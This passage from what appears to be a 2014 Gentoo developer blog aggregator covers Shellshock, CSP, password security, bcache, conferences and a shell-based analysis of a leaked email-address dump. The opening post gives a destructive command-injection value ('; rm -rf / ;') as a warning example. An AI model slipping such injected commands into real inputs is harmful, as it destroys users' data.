Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings in a system() call makes it trivial to implement remote code execution, think of a software using system("convert %s %s-thumb.png") with an user provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(), the mere call will cause the environment to be copied over and thus the code executed. But this relies on /bin/sh to be bash, which is not the case for BSDs, Debian, Ubuntu and a bunch of other situations. But this also requires for the user to be able to change the environment variable.

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I"m sure there are scripts using system(). If this is a nail on the coffin of something, my opinion is that it should be on the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on so forth. It is indeed the case that in the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a 10' pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably have already busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable", "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true, as SANS points out, it's a minimal part of the devices that is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out that the first fix was not thought-out properly) and make sure you don't self-host the stuff you want to keep out of the cloud in a server you upgrade once an year.

Conferencing (September 25, 2014, 18:57 UTC)

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I organize a conference (or rather help organize it, Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and be better the next time I'll try something like this.

_MG_8424.jpg
Photo credit: me

Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong as he had to get an (easy) visa at entrance.

Getting just shy of a hundred people in a city like Dublin, which is by far not a metropolis like Paris or London would be is an interesting exercise, yes we had the space for the conference itself, but finding hotels and restaurants for the amount of people became tricky. A very positive shout out is due to Yamamori Sushi that hosted the whole of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful if the attitudes can be a bit grating online. And given that many people, including me, are known as proponent of Troll-Driven Development – or Rant-Driven Development given that people like Anon, redditors and 4channers have given an even worse connotation to Troll – it's really a requirement, if you are really interested to be part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.

September 24, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and even the reference platform) even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit in the first time, so I re-re-reviewed changes over and over again this time – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.

September 21, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Outreach Program for Women (September 21, 2014, 13:49 UTC)

Libav participated in the summer edition of the OPW. We had three interns Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start and she tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it in smaller chunks to single out false positives. The patch itself gave some spotlights to some of the most horrible code still lingering around, hopefully we’ll get to fix those part soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big projects) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and help others doing the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and make it work at least as well as the former), but both kind of tasks are fundamental to keep the project healthy!

In closing

All the projects have been a success and we are looking forward to see further contributions from our new members!

Sebastian Pipping a.k.a. sping (homepage, bugs)
Designer wanted: Western pieces for Chinese chess (September 21, 2014, 12:36 UTC)

Background

Chinese chess is a lot easer to get into for non-Chinese people if a horse looks like / rather than 馬/傌, for the first few games. Publicly available piece set graphics seem to all have one or more of the following shortcomings:

  • Raster but vector images
  • Unclear or troublesome licensing
  • Poor aesthetics ([1], [2], [3], [4], [5], [6])
  • Lack of elephant, cannon/catapult, advisor pieces

Goal

Simplified, what I am looking for is

The resulting graphics will be published with CC0 Public Domain Dedication licensing for use to everyone. Particular use cases are use with xiangqi-setup, XBoard/WinBoard and Wikipedia.

In more detail

  • Seven pieces per party: Chariot/rook, horse, elephant, advisor, king, cannon/catapult, pawn
  • Use black “ink” only: Black pieces should be all black with parts cut out, “white”/”red” pieces  should be black outlines with body cut out (example here)
  • No two pieces should be hard to distinguish, in particular not:
    • Pawns, advisors and king
    • Elephants and horses
    • Cannons and chariots
  • Advisors should not look similar to queens in western chess
  • Flat 2D is fine. If some pieces imitate 3D, all of them should (so no flat and pseudo 3D in the same set)
  • Needs to work at small sizes. So either two sets for small and regular display or one set that works at any size.
  • Pieces should not have a circle for a background (unlike this)
  • Not too arty, not too fancy, specific rather than abstract. Clean and simple but appealing, please.
  • Chinese culture elements welcome, if you know how to use them well.

Are you interested in working on this project? Please get in touch!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
bcache (September 21, 2014, 11:59 UTC)

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformated the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformated with bcache.
In code:

wipefs /dev/md0 # remove old headers to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!

September 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Some experience with Content Security Policy (September 19, 2014, 08:17 UTC)

XSSI recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.

Conclusion

If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.

September 18, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
Password security in network applications (September 18, 2014, 21:16 UTC)

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications regard the safety of password as essential and do their best to protect it.

In particular, the developer can affect the security of password
in three manners:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.

I will expand on each of them in order.

Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since it can be a valuable information, it should be especially protected so that even in case of unauthorized access to the system the attacker can not obtain it easily.

This could be achieved through use of key derivation functions, for example. In this case, a derived key is computed from user-provided password and used in the system. With a good design, the password could actually never leave client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best than an attacker could get is the derived key with no trivial way of obtaining the original secret.

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.

It is crucial that none of those primitives can be used without proving necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using authentication token that is sent to user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, omitting the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.

Best practices for user management of passwords

Server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage user to use best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, weak password should merely issue a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.

A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there should be a minimum length for a password, it should only focus on withstanding the first round of a brute force attack. Technically saying, any limitation actually reduces entropy since the attacker can safely omit short passwords. However, with the number of possibilities growing incrementally this doesn’t even matter.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case are the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply said, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

September 15, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My thoughts on the Self-Hosting Solution (September 15, 2014, 19:38 UTC)

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that are actually comprised of a fixed part and a mobile one (which is what I used for the longest time). And let's be clear, using the same base password suffixed with the name of the site you're signing up for is not a protection at all, the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to be) to get the password out of the store, it generates the password in the browser, so I don't have to open a terminal and run pwgen, it runs on my cellphone, so I can use it to fetch the password to type somewhere else, and it even auto-fills my passwords in the Android apps, so I don't have to use a simple password when dealing with some random website that then patches to an app on my phone. But it also has a few good "security conveniences": you can re-encode your Vault on a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email you use across services are involved in an account breach.

This does not mean there are no other good password management tools, I know the name of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean Chrome itself has a password manager, it just feels not suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest to just roll your own, be it using some open-source password manager, requiring an external sync system (I did that for sgeps, but it's tied to a single GPG key, so it's not easy for me having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that, it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention to learn how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A on computer B, but then if you change it on both while offline you'll have collisions, so now you lost one of the two changes. They either have no time, or just no interest or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16 years old guy who think he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved to paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week and I know for a fact that at least one group of people got access to the password database, where they were stored in plain text.

Yes it is true, targets such as Adobe will lead to many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fishes can lead to just about the same results, if not even better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to be the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or PoliceAuctions.com, both also involved, have no such statement ether.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw up with an open source program as well, if it's misconfigured, or if a vulnerable version don't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

September 13, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Make password management better (September 13, 2014, 20:13 UTC)

When I posted my previous post on accounts on Google+ I received a very interesting suggestions that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need, is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe parameters such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In this optic, adding a new password-policy.txt file to define some parameters for the password policy of the website.

Things like the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. These are important information that all the password managers need to know, and as I said not all websites make it clear to the user either. I'll recount two different horror stories, one in the past and one more recent, that show how that is important.

The first story is from probably almost ten years ago or so. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my passwords' pattern. Anyway, I liked the idea of having the long password. I signed up for it, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box, no I don't want to comment further on that.

What happens is that the moment I tried to set up the mail fetching on GMail, it kept failing authentication. And I'm sure I used the right password that I've insisted using up to that point! I log in on the website just fine with it, so what gives? A quick check at the password that my browser (I think Firefox at the time) think is the password of that website shows me the truth: the password I've been using to log in does not match the one I tried to use from GMail: the last character is not there. Some further inspection of the postal service website shows that the password fields, both in the password change and login (and I assumed at the time the registration page for obvious reasons), set a maxlength value to 10. So of course, as long as I typed or pasted the password in the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to login out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-characters passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason that I try to log back in after generating the password, I've seen that happening before. In this case, the problem was to be found in the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful are for instance the allowed symbols; I have found that sometimes I need to either generate a number of passwords to find one that does not have one of the disallowed symbols but still has some, or give up on the symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell that the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course if you were just to tell that your website uses the same password as, say, google.com, you're going to have a problem. What you need is a reciprocal indication that both sites think the other is equivalent, basically serving the same identical file. This makes the implementation a bit more complex but it should not be too difficult as those kind of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that difficult.

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

Sebastian Pipping a.k.a. sping (homepage, bugs)
My first cover on a printed book (September 13, 2014, 14:03 UTC)

A few days ago I had the chance to first get my hands on a printed version of that book I designed the cover for: Einführung in die Mittelspieltaktik des Xiangqi by Rainer Schmidt. The design was done using Inkscape and xiangqi-setup. I helped out with a few things on the inside too.

A few links on the actual book:

PS: Please note the cover images are “all rights reserved”.

Gentoo Haskell Herd a.k.a. haskell (homepage, bugs)
ghc 7.8.3 and rare architectures (September 13, 2014, 09:03 UTC)

After some initially positive experience with ghc-7.8-rc1 I’ve decided to upstream most of gentoo fixes.

On rare arches ghc-7.8.3 behaves a bit bad:

  • ia64 build stopped being able to link itself after ghc-7.4 (gprel overflow)
  • on sparc, ia64 and ppc ghc was not able to create working shared libraries
  • integer-gmp library on ia64 crashed, and we had to use integer-simple

I have written a small story of those fixes here if you are curious.

TL;DR:

To get ghc-7.8.3 working nicer for exotic arches you will need to backport at least the following patches:

Thank you!


September 10, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
How to analyze a dump of usernames (September 10, 2014, 14:29 UTC)

There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively gmail.com addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt

This removes some two thousands lines that were not valid addresses — turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt

This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
  238 gmail.com.au
256 gmail.com.br
338 gmail.com.vn
608 gmail.com777
123215 yandex.ru
4800129 gmail.com

So as we were saying earlier there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outlier in the list there are plenty of other domains including Yahoo. Let's just filter away the four thousands addresses using either broken domains or outlier domains and instead focus on these three providers:

$ egrep '@(gmail.com|yahoo.com|yandex.ru)$' source-addresses.txt > good-addresses.txt

Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and similar, the local part of the address (everything before the @ sign) can contain a + sign, when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it to either register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail on different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical, if I was a spammer I would be dropping the extension altogether. Only some very die-hard Unix fans would not allow inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt

The second command filters out some false positives due to two addresses being on the same line; the results from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt

